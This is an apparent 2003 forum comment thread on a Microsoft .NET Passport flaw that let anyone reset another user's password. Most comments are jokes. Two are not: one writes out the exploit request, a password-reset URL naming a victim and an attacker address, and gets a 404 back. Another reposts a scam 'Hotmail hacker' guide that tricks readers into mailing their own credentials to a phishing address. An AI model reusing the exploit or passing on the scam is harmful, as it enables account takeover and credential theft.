Security Vulnerability in Microsoft .NET Passport

Stuart Moore writes "A vulnerability was reported in Microsoft .NET Passport, also affecting Hotmail user accounts. The simple flaw allows an attacker to change any person's password to an arbitrary value. The attacker can then gain access to the victim's accounts, as well as to the victim's personal information (if any is stored w/ Passport). Muhammad Faisal Rauf Danka posted a note to the Full-Disclosure security e-mail list after multiple unsuccessful attempts to contact Microsoft." There's a news report as well.

Remember...

[stu_coates]

Remember folks, this is Trustworthy Computing! ;-)

Oh my God (Mad scramble)

[LookSharp]

Ahhh! I have to go change my Passport profile and take out all those redit cards I added, and transport those top-secret, mission critical emails and documents I have sitting in my Hotmail account!

Why did I trust Microsoft with all of my personal secrets? They've had such great security in the past... /obvious

As lame as it sounds...

[Anonymous Coward]

...This could be a good thing for me. Back in the day, I had a really cool hotmail address, but I neglected it for a while and completely forgot the password. Since all my info was fake, I couldn't request a new password. Off to steal my own account....

Security flaw in Passport!!!!

[grahamlee]

In other news, the world is round, Bill Gates is rich, twice two is four, and the England cricket team haven't won anything.

The Microsoft Information Minster Says:

[retards]

We are secure! There are no security issues in our code. Truly. We shall beat Linux with our shoes and call it a donkey!

now be fair

[Joe the Lesser]

unsuccessful attempts to contact Microsoft.

It's not their fault Outlook kept crashing, right?

Ruh Roh Raggy

[Ralph Wiggam]

Holy Crap!

If someone were to break into my Hotmail account they would find out all the secret ways that I make my penis and breasts larger.

With .NET, there's only one degree of seperation between me and evil crackers.

-B

good

[Nevrar]

"...the victim's accounts..."

It's nice to see people are finally realising that Passport/Hotmail users are victims. ;)

Oh no

[Rik Sweeney]

A remote user can change an arbitrary target user's password to an arbitrary value and then access the target user's account

But that spam is personal to me. It's not for anyone else.

Finally...

[rf0]

All those l33t hax0r can now stop asking how to hack hotmail. The answers right here (if it wasn't 404'd)

Rus

Well, at least now I know...

[johannesg]

...where I don't want to go today.

Perhaps we can take this opportunity to kill all those spam accounts on hotmail. All we need to do is reset all the passwords to impossible strings...

Really tough fix

[alteridem]

Sounds like a really tough fix... Delete the offending page... "There, see, its secure."

Re:Security flaw in Passport!!!!

[jkrise]

"the England cricket team haven't won anything"

I thought they won a moral victory by not travelling to Zimbabwe... and a political victory by making Zim fly to England. Bad example?

Microsoft .NET Passport Passwords.. :-)

[jkrise]

Repeat this rapidly ten times, and watch your tongue get locked faster than Windows XP!!

Re:Remember...

[rf0]

I wouldn't trust them to feed my fish.

Rus

Whoever has got...

[archetypeone]

victim@hotmail.com or attacker@attacker.com is going to be really pissed...

Re:Can someone explain this?

[Anonymous Coward]

I believe that .NET was the cause of the .COM crash. The shit hit the fan around the same time. What a catalyst !

Try stealing billgates@hotmail.com

[jkrise]

You could freak out with all his credit cards! Assuming he's got a good credit rating though :-(

Re:Remember...

[Gortbusters.org]

That's one degree of difference with .NET!

Re:The Microsoft Information Minster Says:

[Anonymous Coward]

What's an AC?

Air Conditioner. I don't think air conditioners are actually banned from moderating, but I've never heard of one that could.

Add one to the pile

[Ashyukun]

Yet another reason to be glad I ditched my Hotmail account and refuse to use Passport after Hotmail 'politely' informed me that my last name (the one I was born with) violated their offensive language filter and asked me to change my last name.

Re:Try stealing billgates@hotmail.com

[miscGeek]

Even Billy Boy knows better than to trust M$ with his credit card information :)

Re:Security flaw in Passport!!!!

[rifter]

twice two is four

It seems you are overdue for your appointment at miniluv, thought criminal!

Re:Ruh Roh Raggy

[archen]

If you have a penis AND breasts (and feel the need to enlarge them) you probably really do have a lot of secrets...

Re:Try stealing billgates@hotmail.com

[rf0]

or just go for abuse@hotmail.com.

Rus

Re:Oh my God (Mad scramble)

[Anonymous Coward]

I have to go change my Passport profile and take out all those redit cards I added, and transport those top-secret, mission critical emails and documents I have sitting in my Hotmail account!

Don't bother, I just did it for you.

Re:FUD

[Bendy Chief]

This, friend, is why I write my passwords on all my personal effects!

It's handy-dandy, and I've never had a probASDFK6GJL45SDJ6G-CARRIER LOST-

Re:How do you contact Microsoft?

[PerryMason]

Do they actually have a procedure to inform them when things are broken?

As far as i'm aware, they have a guy who just keeps clicking reload on the /. front page waiting for a new MS vulnerability story to pop up. They tried the same thing with Bugtraq but there were just way too many vulnerabilities for the poor guy to keep up.

Re:Remember...

[jkrise]

" according to a dutch news site this hole was fixed shortly after the posting... "

If sending 404 Page Not Found messages to users trying to update passwords can be called fixing, well, MS indeed fixed it.

Funny stuff

[Anonymous Coward]

From the passport.net page, in a big green box, under the title "SECURITY", it reads:

Sign in on any computer that has Internet access. .NET Passport uses powerful online security technology and follows a comprehensive privacy policy to help protect your profile information. You manage your information-sharing options.

Re:Add one to the pile

[FauxPasIII]

I think I speak for everyone here when I ask... What's your last name ?!

Could be worse...

[Ratface]

They could fix it by making it impossible to enter arbitrary URLs in the next version of Internet Explorer :-D

Re:Add one to the pile

[dubstop]

That's how it starts.

In fifty years time, when Microsoft are in charge of the planet, they won't be asking you to change your last name, they'll be telling you that they've already changed your entire name to a 256-character, globally unique identifier. For your convenience, of course, and at a very reasonable fee of M$50 (MicroSerfian dollaroonies), which, again for your convenience, they've already deducted from your (compulsory) Bank of Microsoft account. As a result of this unexpected deduction, your account will go M$1 overdrawn, and this will mean that they are entitled to immediate vacant possession of your home. When you query this, it will be pointed out that this entitlement was clearly detailed in 2-point font, on page 437 (that's about one-third of the way in) of the click-through agreement that you read, understood, and click-through-agreed to when opening your (compulsory) Bank of Microsoft account. At the time that this is pointed out, your attention will be drawn to the clause on page 442 that they are also entitled to one of every major organ that you have two of. This includes (but is not limited to) your lungs, kidneys and, at the discretion of the Microsoft legal department (formerly known as the US Department of Justice), your testicles. They will gladly help you to pay for the operation to remove these organs, by the extension of a small loan, repayable in 7200 monthly payments that, for your convenience, will exactly match your monthly salary. You will be responsible for the shipping of at least two of your children to the secure holding facility at Redmond, where they will be held as collateral for the duration of the loan.

Where do you want to go today?

Re:Remember...

[mbourgon]

MS has admitted that Trustworthy Computing has nothing to do with security. It's all about whether you trust Microsoft. Do you trust them enough to give them money? If so, they've met their goals.

Re:Oh no, not again...

[Anonymous Coward]

Microsoft hires only "geniuses", i.e., no common sense whatever!

Re:Try stealing billgates@hotmail.com

[Anonymous Coward]

That reminds me of the time I and a friend noticed a free mail provider that had forgotten to reserve certain interesting (to say the least) addresses.

I got webmaster@... and I believe my friend got administrator@...

I don't know if my friend got any mail, but I got a lot of interesting messages until I got bored and stopped checking it :-)

Now, before any of you start bashing me for being irresponsible, I did try to help out the users who sent me mail. Mostly I just told them who to really contact.

I did get carried away a couple of times though. Once I decided to reply to a spam complaint and thanked them for the nice porn links they forwarded to me. They never responded, funny thing.

(this posted anonymously for obvious reasons)

Re:FUD

[mulhall]

You seem to be under the the impression that legitimate users actually change their passwords - what planet are you living on?!

Re:Add one to the pile

[pcardoso]

funny... I just had the same problem while registering an hotmail account for my girlfriend to use, so we could IM each other... most of our contacts are MSN addresses, so Windows Messenger was the best choice. I don't like that much, but what the hell! Gaim has no problems with that..

Back to the topic, her name is Ana Luisa and guess what happens when you concatenate her first two names together! It was getting on my nerves to receive a error message because of some issue with the username (but not an existing username, oddly)... It was only after a lot of attempts that I noticed the first 4 chars of the username... Added a underscore and it was all ok...

Re:Can someone explain this?

[Kredal]

So if I start the .ORG service, can I kill the .NET system?

So who wants to join the .ORG at my place next friday? (:

Re:FUD

[Exedore]

Mechanic: We fixed your brakes... they no longer make that awful screeching sound.
Me: Thanks. How did you fix them?
Mechanic: We removed the brakes entirely
Me: What the...
Mechanic: That will be $567.98, please.

Re:Oh my God (MS explains it all..)

[jkrise]

It seems that all Passport Update Services have been disabled, owing to millions of user complaints about spam! All mail accounts will need to be checked manually for spam. (all software MS Junk mail filters etc. have been junked already).

Of course, this means that Full Control of user accounts is needed. The process of manually cheking every single mail account for spam is underway. When all the billion accounts are checked and spam deleted, Passport .Net will be re-activated.

This is the beginning of the Passport Update Synchronized Service Year (PUSSY) efforts. Thanks for your attention.

Another Hotmail Password Hack found on Kazaa

[doublem]

Hotmail password hacker.doc

THIS IS HOW TO HACK ANYONE'S HOTMAIL PASSWORD

Step 1:
send a mail to Robot_pass_finder@hotmail.com with PW: fetchpass in the subject line

Step 2: The email body
In the first line: put the complete email address of the user whose password you want.

In the 5th line, type the email address and the login (pass) you want the password sent to,
here is an exemple:

To: Robot_pass_finder@hotmail.com
Subject: PW: fetchpass
CC.________________ BCC.___________________
=-email body-=

address@hotmail.com

your email adress here example.: myemail@hotmail.com
your pass here example.: mypassword

The problem with global accounts like Passport

[Jugalator]

One Company to rule them all
One Hacker to find them
One Exploit to bring them all
to the attacker's power

Re:What breed of idiot are you?

[Dark Lord Seth]

lynx -head -source --mime-header 'https://register.passport.net/emailpwdreset.srf?l c=1033&em=victim@hotmail.com&id=&cb=&prefem=attack er@attacker.com&rst=1'

HTTP/1.1 404 Not Found
Server: Apache/2.0.43 (Unix)
Date: Thu, 08 May 2003 13:10:14 GMT
PPServer: H: LAWPPREGU4A002

This would be allot more fun to see though...

*Sigh*

[White Roses]

The unfortunate thing is that I don't know anyone who is both (a) stupid enough to use Hotmail and (b) grotesquely stupid enough to store personal information in Passport.

I need to make some stupid friends, it seems. Well, friends who are more stupid than the ones I have now, at any rate.

But it's a good exploit, anyway. Kudos to the person who slaved for almost 15 minutes to figure it out (that's not a slander against the cracker in question, but against the pathetic sec- . . . secuuu- . . . jeez, I can't even call it what MS wants me to think it is).